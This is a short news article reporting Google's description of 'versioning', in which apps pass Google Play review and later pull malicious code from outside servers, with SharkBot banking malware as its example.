In this method, hackers bypass Google Play’s security controls by making different versions of legal programs and releasing their malware.
Google’s security team has explained a common tactic called versioning, through which hackers can bypass Google Play’s review and security controls and inject malware into users’ Android devices.
in this technique, hackers spread malware either through updates to pre-installed programs or by downloading malicious code from servers under their control. Google explains:
“One of the ways hackers try to bypass Google Play’s security controls is versioning. Versioning occurs when a developer has released an early version of an app on Google Play that appears legitimate and has been verified by our reviews. “But then it receives an update from a third-party
server that modifies the code on the end-user’s device and enables its malicious activities.”
Google further points out that apps that engage in such activities violate Google Play’s deceptive behavior policy and can be labeled as backdoors.
According to current Google Play guidelines, apps published through the service cannot modify, replace, or update their app using any method other than the official update mechanism provided by Google. Also, these programs are prohibited from downloading executable codes (such as dex, JAR, or so. files) from external sources.
Malware that uses this technique in Google Play
Google also points to a specific type of malware called SharkBot, which was first discovered in 2021 by Cleafy’s intelligence team, and uses the same technique. SharkBot is a banking malware that, after infiltrating Android devices, conducts unauthorized money transfers through the Automated Transfer Service (ATS) protocol.
The hackers responsible for SharkBot use the strategy of releasing versions with limited functionality on Google Play to hide the dubious nature of their apps. However, when the user downloads the trojan version of the program, he receives the full version of the malware.
